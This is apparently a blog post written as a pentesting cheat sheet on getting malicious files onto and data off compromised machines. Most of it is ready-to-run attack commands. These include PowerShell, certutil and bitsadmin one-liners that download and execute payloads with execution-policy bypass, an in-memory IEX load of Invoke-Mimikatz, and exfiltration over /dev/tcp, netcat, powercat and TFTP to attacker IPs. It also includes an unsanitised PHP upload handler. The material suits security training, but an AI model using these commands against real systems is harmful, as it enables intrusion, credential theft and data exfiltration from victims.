Upping your file transfer game

Transferring files is easy. Transferring files on hardened machines remotely, while trying to stay inconspicuous and undetected is a little harder. This here is to try and help with a few methods to add to your toolbelt.

by Johann Van Niekerk

Upping your file transfer game

Share

Introduction

Transferring files sounds like a pretty simple concept and most people would agree that the idea of 'transferring' movies, pdf or docx files and similar documents would be as simple as opening a shared folder or moving the files onto a disk such as a portable harddrive or a USB drive. That is simple enough but in the context of Offensive Security then the idea would be to transfer malicious files through other computers remotely  and using methods that are a little closer to manipulating or taking advantage of the underlying programming code of a operating system and the software that is available.

This is important because not every computer, user or enterprise has the exact guarantee of tools available to make file transferring work and this will be due to various reasons from not having a programming language like python installed or from intentional security hardening within a business.

It is forth mentioning that these files are also malicious with the intention of exploitation and that doesn't make this easy. So I've prepared a bunch of methods that I've used and come across to show you a diverse cheat-sheet of being able to transfer files between various operating systems and software methods; allowing you to get the tools you need onto the remote system.

Full disclosure: As these topics are regarding Offensive Security tactics, this is being written with the intention of researching and you should not test these tools out without prior experience or understanding of what you are doing and what the tools are doing. Many of these tools are clearly intended for exploitation and should not be kept on your system.

A Braindump of Tools & Methods

Python HTTP Server

The following is a nice and simple method of hosting files on your system and allowing remote access to them. The requirements is just having the Python Language installed and is usable across operating systems. A simple example would be that the Pentester sets up a server hosting a file called malicious_file.exe and then from a remote machine; that machine can access and download tjat file through the browser http://pentester_ip/  that will display all the items being hosts on the Python server or downloading the file with various tools ex. wget http://pentester_ip/malicious_file.exe.

Setting up Python HTTP Server:

# Setup HTTP Server In Current Directory
python -m SimpleHTTPServer 80
python3 -m http.server 80
    -> '[ pentester ] Setup server in directory to feed file on port 80'

Updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic authentication. This tool is nifty as it allows uploading (or in the event of compromise; exfiltrating 'sensitive') documents from the remote machine and having it saved locally on your own machine.

The tool has the same dependencies such as requiring the Python Language to be installed but it provides some additional benefits that are certainly welcome. This tool is definitely a preferred method for downloading and uploading documents or files.

Installation:

# Install
pip3 install updog

Use From Commandline:

# Usage
updog
updog -d /chosen/directory
updog -d /chosen/directory -p chosen_port

Example of what it looks like:

SMB

SMB is a well known protocol and I am sure a lot of people may be familiar with it but it is also a great way of sharing, transferring files and exploitation. The best part about using SMB for sharing to a windows host is that you don't need to transfer anything; you can run the pentesting tools directly from your own machine. Part of the Impacket library of scripts, impacket-smbserver is a great way to setup a quick sharefolder in the current directory and then allowing you to utilise that none of the tools are being transferred onto the system at all.

Below are a few examples of using SMB for file transfers to a remote Windows machine.

Installation:

sudo apt install impacket-scripts

Navigate to directory to share:

# Setup SMB server in current directory
impacket-smbserver share .

Running  tools directory on a Remote Machine:

# Example of Running Tools [ Perspective: Remote Windows Machine]
//10.10.10.10/share/winPEASx64.exe searchall cmd
    -> 'launching "WinPEAS" executable with accompanying switches'
//10.10.10.10/share/lazagne.exe all

Setup to browse shared folder from Remote Machine:

# Attempt to navigate to the SMB Share Folder through Windows Explorer (Doesn't always work)
net use Z: \\10.10.10.10\share
    -> 'assign sharefolder to Z: drive'
cd Z:
    -> 'navigate to Z drive'

Upload & download files:

# Upload Files To Sharefolder [ Exfiltration ]
copy victim_outgoing_file.txt \\10.10.10.10\$port_eg:1234\pentester_saved_file.txt

# Download Files From Sharefolder
copy \\10.10.10.10\1234\pentester_outgoing_file.txt ./victim_saved_file.txt
copy //10.10.10.10/share/PowerUp.ps1 .

SCP

SCP or SecureCopy is a protocol that is based on the SSH protocol however allows the upload or download of files remotely. If you understand SSH then you will understand SCP syntax and the below examples is demonstrative of how powerful this is to transfer files.

The obvious benefits is that due to it being based on the SSH protocol, it also has all  the benefits of the SSH protocol such as the traffic being encrypted thereby assuring the authenticity and confidentiality of the data files in transit.

Upload & download files:

# Download File [ From Victim To Pentester ]
scp -P 2222 student@10.10.10.10:victim_incoming_file.exe ./attacker_saved_file.exe

# Upload File [ From Pentester To Victim ]
scp -P 2222 ./attacker_outgoing_file.exe student@10.10.10.10:/tmp/victim_saved_file.exe

Powershell

Using various methods through Powershell and supported modules that may be available. Be aware that the idea behind the below methods is to make a quick 1-liner however adapt the commands depending on the situation.

For example depending on if you have a Powershell shell or a CMD shell:

# Methods of accessing TEMP folder
$env:temp
cmd /c $env:temp/shell.exe
powershell.exe -c $env:temp/shell.exe

WebClient Download:

#WebClient - Download & Execute
powershell.exe -nop -ep bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10:1234/PsExec.exe', '$env:temp\psexec.exe')"; powershell.exe -c $env:temp/psexec.exe
    # or cmd /c $env:temp/shell.exe

Wget Download:

# Wget - Download & Execute
powershell.exe -nop -ep bypass -c "wget '10.10.10.10:1234/shell.exe' -o $env:temp/shell.exe"; powershell.exe -c $env:temp/shell.exe

Bitsadmin Download:

# Bitsadmin - Download & Execute
powershell.exe -nop -ep bypass -c "bitsadmin /transfer wcb /priority foreground http://10.10.10.10:1234/shell.exe $env:temp/shell.exe";  powershell.exe -c $env:temp/shell.exe

Invoke-WebRequest Download:

# Invoke-WebRequest - Download & Execute
powershell.exe -nop -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.10.10:1234/shell.exe' -Outfile '$env:temp/shell.exe'"; cmd.exe /c $env:temp/shell.exe;

IEX - Load Script To Memory:

# IEX - Load ps1 Script directly into memory
powershell.exe -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10:1234/Invoke-Mimikatz.ps1')"

BitsTransfer

A Powershell module that requires to be loaded prior to being utilised. BitsTransfer is a little hit & miss as it is enabled by default on many machines but is more often than not disabled intentionally.

BitsTransfer Download:

# BitsTransfer Download & Execute
# Enabled by default on many machines but not guaranteed

Import-Module BitsTransfer                                                                  
powershell.exe -nop -exec bypass -c "start-bitstransfer -source 'http://10.10.10.10:1234/shell.exe' -destination './shell.exe'; ./shell.exe"

Apache Server Upload

Requires setting up a few items in order to utilised an Apache server. This setup is done on a Linux host and will require all the dependencies to have it up and running.

Note:

Setup an Upload.php Page & Code:

# Create & Save 'upload.php' >> /var/www/html
    <?php
    $uploaddir = '/var/www/uploads/';
    
    $uploadfile = $uploaddir . $_FILES['file']['name'];
    
    move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
    ?>

Setup an Uploads directory:

# Make Uploads folder
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads

Ensure you start the Apache2 service:

service apache2 start

Upload through POST requests

# Upload file from TEMP folder to Kali /var/www/uploads
powershell.exe -nop -ep bypass -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/uploads.php', '$env:temp\shell.exe')"
    # 2nd argument (path) requires FULL path

bash -c 'echo -e "POST / HTTP/0.9 $(<flag2hex.bat)" > /dev/tcp/10.10.10.10/4444'

CMD

When dealing with just a simple Commandline without the benefits of Powershell and its powerful features.

# Methods of accessing TEMP folder
    %tmp%
    cmd /c %tmp%/shell.exe
    powershell.exe -c %tmp%/shell.exe

# Chain Commands
&&  : Complete only if previous successful
&   : Complete after
|   : Windows 95, 98, ME

Note:

Certutil - Download:

# Certutil
certutil -urlcache -f http://10.10.10.10:1234/plink32.exe %tmp%/plink32.exe && %tmp%/plink32.exe

Bitsadmin - Download:

#  Bitsadmin
cmd.exe /c "bitsadmin /transfer wcb /priority foreground http://10.10.10.10:1234/shell.exe %tmp%/shell.exe" && %tmp%/shell.exe

Powershell - Download:

# Powershell
powershell.exe -nop -ep bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10:1234/shell.exe', '%tmp%/shell.exe')"; cmd.exe /c %tmp%/shell.exe

Netcat

Due the program and the programming instructions it relies on; be extra cautious with transferring any binary files as it is possible for the binary to be corrupted when it is rebuilt on the receiving endpoint.

Download & Upload:

# Setup Listener, wait for file
nc -lvnp 4444 > incoming_file.sh                     

# Send File to Listener
nc -nv 10.10.10.10 1234 < sending_file.sh

# Setup Listener, Send File to whoever connects
nc -lvnp 4444 < incoming_file.sh

# Connect to Retrieve File
nc -nv 10.10.10.10 1234 > sending_file.sh

Powercat.ps1

Dubbed as the Netcat for Powershell and will accomplish the same as what Netcat does, however it is useable with Powershell although with unique syntax compared to netcat. The tools is useful if available or if you prefer the netcat method for exfiltration of data. Additionally as this is a powershell script then it can be loaded within memory without worrying about having anyone written to disk.

Download & Upload:

# Setup listener to receive file
nc -lvnp 4444 > incoming_file.sh

# Send file to Listener
powercat -c 10.10.10.10 -p 4444 -i /path/to/victim_outgoing_file.sh

# Setup listener to send file
nc -lvnp 4444 < incoming_file.sh

# Connect and retrieve file
powercat -c 10.10.10.10 -p 4444 -i /path/to/attacker_outgoing_file.sh

One liner to Exfiltrate Data:

powershell.exe -nop -ep bypass -c "iex(New-Object System.Net.WebClient).DownloadString('http:172.16.40.5:1234/powercat.ps1');powercat -c 172.16.40.5 -p 4444 -i 'C:\Path\To\Outgoing\File.txt' -v"

Socat

Socat has a reputation of being an advanced version of netcat. Among its various features that include port forwarding, reverse shells & pivoting; it is also a great multi-relaying tool for transferring data. It does require that the binary (whether linux or windows executable) is on both endpoints in order to create the connection. Netcat can also connect to a Socat endpoint although the features may be limited.

Download & Upload:

# Syntax below is interchangeable
# Setup Listener to Receive File
socat -u tcp-listen:4444,reuseaddr open:shell.exe,create

# Send File to Listener
socat -u file:shell.exe tcp-connect:10.10.10.10:4444

# Setup Listener to Send File
socat TCP4-LISTEN:4444,fork file:./shell.exe

# Connect and Retrieve file
socat TCP4:10.10.10.10:4444 file:shell.exe,create

WGET

Wget is nice and simple utility to download files from the web or through HTTP, HTTPS and FTP protocols. Wget is a utility that is by default with most  Linux distributions and is commonly available through Powershell on Windows as well.

Download:

# Download File
wget 10.10.10.10:1234/program.sh -O /dev/shm/Save_program_here.sh

Curl

Curl is a tool for transferring data to and from a server. It is powerful and offers a busload of useful tricks while interacting with numerous different protocols. The following is a snippet of just being able to upload & download files.

Download & Upload:

# Download File
curl 10.10.10.10:1234/program.sh -o /dev/shm/program.sh

# Upload Through POST Request
curl -X POST "https://MyUsername:MySectretPassword@api.bitbucket.org/2.0/repositories/dummyTeam/myproject/downloads" --form files=@"/home/dev/release\myproject-current.zip"

/dev/tcp

Bash redirection features and making use of instructions to the socket. The following technique is specific to Linux victims and allows the use of /dev/tcp to redirect and communicate to an external machine. The scope being limited to transferring files; the following is a brief overview of how to utilise this method.

Note:

Transfer File From Victim:

# Setup Kali Listener, Waiting for file
nc -lvnp 80 > attacker_incoming_file.sh 

# Connect to listener and send file
cat /path/victim_sending_file.sh > /dev/tcp/10.10.10.10/80
bash -c 'cat /path/victim_sending_file.sh > /dev/tcp/10.10.10.10/80' 

Transfer File To Victim:

# Setup Kali Listener, feeding file
nc -w5 -lvnp 80 < attacker_sending_file.txt

# Connect to listener and get file
exec 6< /dev/tcp/10.10.10.10/80
cat <&6 > victim_incoming_file.txt

# Alternative, get file
bash -c 'cat < /dev/tcp/10.10.10.10/4444 > victim_receiving_file.sh'

Transfer File To Attacker HTTP Service:

# Upload from Victim over HTTP  [ require HTTP service running on the attacker machine ]
bash -c 'echo -e "POST / HTTP/0.9 $(<flag2hex.bat)" > /dev/tcp/10.10.10.10/4444'

FTP Download

Basic FTP file transfer such as using pure-ftpd. Requires some setup in order to recreate and use FTP to upload and download files.

# Setup FTP on Attacker Machine
sudo apt update && sudo apt install pure-ftpd

# Script to setup FTP
    #!/bin/bash
    # Setup with USER atk & PASS atk
    sudo groupadd ftpgroup
    sudo useradd -g ftpgroup -d /dev/null -s /bin/zsh
    sudo pure-pw useradd offsec -u ftpuser -d /ftphome
    sudo pure-pw mkdb
    cd /etc/pure-ftpd/auth/
    sudo ln -s ../conf/PureDB 60pdb
    sudo mkdir -p /ftphome
    sudo chown -R ftpuser:ftpgroup /ftphome/
    sudo systemctl restart pure-ftpd

# Move Share files into /ftphome
sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/

# [Windows Victim] Create textfile.txt locally sending commands through non-interactive REMOTE shell:
echo open 192.168.119.249 21
echo USER atk
echo atk
echo bin
echo GET nc.exe
echo bye

# Issue Command to transfer file locally
ftp -v -n -s:textfile.txt

VBScript Download

Using VBScript and Powershell Cscript in order to download a file. Requires setup of a pseudo-wget utility script that allows the download of files.

# VBScript HTTP downloader script

# [Windows Victim] Create wget.vbs Script locally sending commands through non-interactive REMOTE shell:
# This Script will be a pseudo wget Utility
# You Can copy/paste the entire lot into your remote shell
echo "strUrl = WScript.Arguments.Item(0)" > wget.vbs
echo "StrFile = WScript.Arguments.Item(1)" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" >> wget.vbs
echo "Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts" >> wget.vbs
echo " Err.Clear" >> wget.vbs
echo " Set http = Nothing" >> wget.vbs
echo ' Set http = CreateObject("WinHttp.WinHttpRequest.5.1")' >> wget.vbs
echo ' If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")' >> wget.vbs
echo ' If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")' >> wget.vbs
echo ' If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")' >> wget.vbs
echo ' http.Open "GET", strURL, False' >> wget.vbs
echo " http.Send" >> wget.vbs
echo " varByteArray = http.ResponseBody" >> wget.vbs
echo " Set http = Nothing" >> wget.vbs
echo ' Set fs = CreateObject("Scripting.FileSystemObject")' >> wget.vbs
echo ' Set ts = fs.CreateTextFile(StrFile, True)' >> wget.vbs
echo ' strData = ""' >> wget.vbs
echo ' strBuffer = ""' >> wget.vbs
echo " For lngCounter = 0 to UBound(varByteArray)" >> wget.vbs
echo " ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))" >> wget.vbs
echo " Next" >> wget.vbs
echo " ts.Close" >> wget.vbs

# Powershell - Executing the VBScript HTTP downloader script with cscript:
cscript wget.vbs http://192.168.119.249:1234/shell.exe shell.exe

TFTP Upload

Use TFTP to exfiltrate files to your local machine.

# Setup TFTP on Kali Port 69
sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp

# Start Service
sudo atftpd --daemon --port 69 /tftp

# [Windows Victim] Run tftp client on Windows system and upload to /tftp folder
tftp -i 192.168.119.249 put ./shell.exe

Final Word

While this was a braindump of various methods; there is many more out there that you may prefer. This similarly was intended for other students who are at a level of understanding what the tools do and how to setup/install or navigate the instructions to make it work.

Hopefully you found  a couple of tips that you can add to your own collection of notes!